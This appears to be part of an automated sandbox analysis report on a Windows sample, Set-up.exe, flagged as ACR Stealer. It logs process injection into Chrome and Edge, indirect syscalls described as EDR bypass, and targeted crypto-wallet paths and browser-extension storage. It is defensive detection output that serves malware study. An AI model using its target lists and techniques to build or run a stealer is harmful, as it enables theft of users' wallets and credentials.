Source: C:\Users\user\Desktop\Set-up.exe	Memory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 219D0270000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory allocated: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 21C401A0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory allocated: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 21C401B0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory allocated: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 21C401C0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory allocated: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 21C401D0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 14384170000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 14384180000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 14384190000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 143841A0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 143841B0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 143841C0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory allocated: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1FB3FED0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory allocated: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1FB3FEE0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory allocated: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1FB3FEF0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory allocated: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1FB3FF00000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory allocated: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1FB3FF10000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory allocated: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1FB3FF20000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 27687980000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 27687990000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 276879A0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 276879B0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 276879C0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 276879D0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory allocated: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 297CF380000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory allocated: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 297CF390000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory allocated: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 297CF3A0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory allocated: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 297CF3B0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory allocated: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 297CF3C0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory allocated: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 297CF3D0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 22EAF860000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 22EAF870000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 22EAF880000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 22EAF890000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 22EAF8A0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 22EAF8B0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory allocated: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1C72B130000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory allocated: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1C72B140000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory allocated: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1C72B150000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory allocated: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1C72B160000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory allocated: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1C72B170000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory allocated: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1C72B180000 protect: page execute and read and write	Jump to behavior

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Users\user\Desktop\Set-up.exe

NtAllocateVirtualMemory: Indirect: 0x268845D

Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\Desktop\Set-up.exe	Thread register set: target process: 1300	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Thread register set: target process: 6184	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Thread register set: target process: 5760	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Thread register set: target process: 1380	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Thread register set: target process: 2444	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Thread register set: target process: 3832	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Thread register set: target process: 4544	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Thread register set: target process: 4988	Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 219D0240000	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 219D0250000	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 219D0260000	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 219D0230000	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 219D0230008	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 219D0230010	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 219D0230018	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 219D0230020	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 219D0230028	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 219D0230030	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 219D0270000	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 0	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 21C401B0000	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 21C401C0000	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 21C401A0000	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 21C401A0008	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 21C401A0010	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 21C401A0018	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 21C401A0020	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 21C401A0028	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 21C401A0030	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 21C401D0000	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 14384180000	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 14384190000	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 143841A0000	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 14384170000	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 14384170008	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 14384170010	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 14384170018	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 14384170020	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 143841C0000	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1FB3FEE0000	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1FB3FEF0000	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1FB3FF00000	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1FB3FED0000	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1FB3FED0008	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1FB3FED0010	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1FB3FED0018	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1FB3FED0020	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1FB3FF20000	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 27687990000	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 276879A0000	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 276879B0000	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 27687980000	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 27687980008	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 27687980010	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 27687980018	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 27687980020	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 276879D0000	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 297CF390000	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 297CF3A0000	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 297CF3B0000	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 297CF380000	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 297CF380008	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 297CF380010	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 297CF380018	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 297CF380020	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 297CF3D0000	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 22EAF870000	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 22EAF880000	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 22EAF890000	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 22EAF860000	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 22EAF860008	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 22EAF860010	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 22EAF860018	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 22EAF860020	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 22EAF8B0000	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1C72B140000	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1C72B150000	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1C72B160000	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1C72B130000	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1C72B130008	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1C72B130010	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1C72B130018	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1C72B130020	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1C72B180000	Jump to behavior

Source: C:\Users\user\Desktop\Set-up.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Set-up.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.7.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.7.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.7.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.7.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected ACR Stealer

Source: Yara match

File source: Process Memory Space: Set-up.exe PID: 7468, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: Set-up.exe, 00000000.00000002.1705937960.0000000004A70000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: \Roaming\Electrum\wallets
Source: Set-up.exe, 00000000.00000002.1705937960.0000000004A70000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: \Roaming\ElectronCash\wallets
Source: Set-up.exe, 00000000.00000002.1705937960.0000000004A70000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Publicp.inir......useruser\??\C:\Users\user\??\C:\Users\userAll UsersAll Users\??\C:\Users\All Users\??\C:\Users\All UsersDefaultDefault\??\C:\Users\Default\??\C:\Users\DefaultDefault UserDefault User\??\C:\Users\Default User\??\C:\Users\Default Userdesktop.inidesktop.ini\??\C:\Users\desktop.iniPublicPublic\??\C:\Users\Public\??\C:\Users\Public\??\C:\Users\user\AppData\??\C:\Users\user\AppData\Roaming\Electrum\wallets\??\C:\Users\user\AppData\Roaming\Electrum\wallets\??\C:\Users\All Users\AppData\??\C:\Users\All Users\AppData\Roaming\Electrum\wallets\??\C:\Users\All Users\AppData\Roaming\Electrum\wallets\??\C:\Users\Default\AppData\??\C:\Users\Default\AppData\Roaming\Electrum\wallets\??\C:\Users\Default\AppData\Roaming\Electrum\wallets\??\C:\Users\Default User\AppData\??\C:\Users\Default User\AppData\Roaming\Electrum\wallets\??\C:\Users\Default User\AppData\Roaming\Electrum\wallets\??\C:\Users\Public\AppData\??\C:\Users\Public\AppData\Roaming\Electrum\wallets\??\C:\Users\Public\AppData\Roaming\Electrum\wallets
Source: Set-up.exe, 00000000.00000002.1705937960.0000000004A70000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: Set-up.exe, 00000000.00000002.1705937960.0000000004A70000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: \Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb
Source: Set-up.exe, 00000000.00000002.1705937960.0000000004A70000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: exodus.conf.json
Source: Set-up.exe, 00000000.00000002.1705937960.0000000004A70000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: info.seco
Source: Set-up.exe, 00000000.00000002.1705937960.0000000004A70000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Publicp.inir......useruser\??\C:\Users\user\??\C:\Users\userAll UsersAll Users\??\C:\Users\All Users\??\C:\Users\All UsersDefaultDefault\??\C:\Users\Default\??\C:\Users\DefaultDefault UserDefault User\??\C:\Users\Default User\??\C:\Users\Default Userdesktop.inidesktop.ini\??\C:\Users\desktop.iniPublicPublic\??\C:\Users\Public\??\C:\Users\Public\??\C:\Users\user\AppData\??\C:\Users\user\AppData\Roaming\Exodus\??\C:\Users\user\AppData\Roaming\Exodus\??\C:\Users\All Users\AppData\??\C:\Users\All Users\AppData\Roaming\Exodus\??\C:\Users\All Users\AppData\Roaming\Exodus\??\C:\Users\Default\AppData\??\C:\Users\Default\AppData\Roaming\Exodus\??\C:\Users\Default\AppData\Roaming\Exodus\??\C:\Users\Default User\AppData\??\C:\Users\Default User\AppData\Roaming\Exodus\??\C:\Users\Default User\AppData\Roaming\Exodus\??\C:\Users\Public\AppData\??\C:\Users\Public\AppData\Roaming\Exodus\??\C:\Users\Public\AppData\Roaming\Exodus
Source: Set-up.exe, 00000000.00000002.1705937960.0000000004A70000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: passphrase.json
Source: Set-up.exe, 00000000.00000002.1705937960.0000000004A70000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Publicp.inir......useruser\??\C:\Users\user\??\C:\Users\userAll UsersAll Users\??\C:\Users\All Users\??\C:\Users\All UsersDefaultDefault\??\C:\Users\Default\??\C:\Users\DefaultDefault UserDefault User\??\C:\Users\Default User\??\C:\Users\Default Userdesktop.inidesktop.ini\??\C:\Users\desktop.iniPublicPublic\??\C:\Users\Public\??\C:\Users\Public\??\C:\Users\user\AppData\??\C:\Users\user\AppData\Roaming\Ethereum\??\C:\Users\user\AppData\Roaming\Ethereum\??\C:\Users\All Users\AppData\??\C:\Users\All Users\AppData\Roaming\Ethereum\??\C:\Users\All Users\AppData\Roaming\Ethereum\??\C:\Users\Default\AppData\??\C:\Users\Default\AppData\Roaming\Ethereum\??\C:\Users\Default\AppData\Roaming\Ethereum\??\C:\Users\Default User\AppData\??\C:\Users\Default User\AppData\Roaming\Ethereum\??\C:\Users\Default User\AppData\Roaming\Ethereum\??\C:\Users\Public\AppData\??\C:\Users\Public\AppData\Roaming\Ethereum\??\C:\Users\Public\AppData\Roaming\Ethereum
Source: Set-up.exe, 00000000.00000002.1705937960.0000000004A70000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: \Roaming\Exodus
Source: Set-up.exe, 00000000.00000002.1705937960.0000000004A70000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance
Source: Set-up.exe, 00000000.00000002.1705937960.0000000004A70000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: \Roaming\Ethereum
Source: Set-up.exe, 00000000.00000002.1705937960.0000000004A70000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: \Roaming\Coinomi\Coinomi\wallets
Source: Set-up.exe, 00000000.00000002.1705937960.0000000004A70000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: \Roaming\MultiDoge
Source: Set-up.exe, 00000000.00000002.1705937960.0000000004A70000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: seed.seco
Source: Set-up.exe, 00000000.00000002.1705937960.0000000004A70000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: keystore
Source: Set-up.exe, 00000000.00000002.1705937960.0000000004A70000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: \Roaming\Ledger Live
Source: Set-up.exe, 00000000.00000002.1705937960.0000000004A70000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Publicp.inir......useruser\??\C:\Users\user\??\C:\Users\userAll UsersAll Users\??\C:\Users\All Users\??\C:\Users\All UsersDefaultDefault\??\C:\Users\Default\??\C:\Users\DefaultDefault UserDefault User\??\C:\Users\Default User\??\C:\Users\Default Userdesktop.inidesktop.ini\??\C:\Users\desktop.iniPublicPublic\??\C:\Users\Public\??\C:\Users\Public\??\C:\Users\user\AppData\??\C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\??\C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\??\C:\Users\All Users\AppData\??\C:\Users\All Users\AppData\Roaming\Electrum-LTC\wallets\??\C:\Users\All Users\AppData\Roaming\Electrum-LTC\wallets\??\C:\Users\Default\AppData\??\C:\Users\Default\AppData\Roaming\Electrum-LTC\wallets\??\C:\Users\Default\AppData\Roaming\Electrum-LTC\wallets\??\C:\Users\Default User\AppData\??\C:\Users\Default User\AppData\Roaming\Electrum-LTC\wallets\??\C:\Users\Default User\AppData\Roaming\Electrum-LTC\wallets\??\C:\Users\Public\AppData\??\C:\Users\Public\AppData\Roaming\Electrum-LTC\wallets\??\C:\Users\Public\AppData\Roaming\Electrum-LTC\wallets@I

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kbdcddcmgoplfockflacnnefaehaiocb	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobl	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\eklfjjkfpbnioclagjlmklgkcfmgmbpg	Jump to behavior
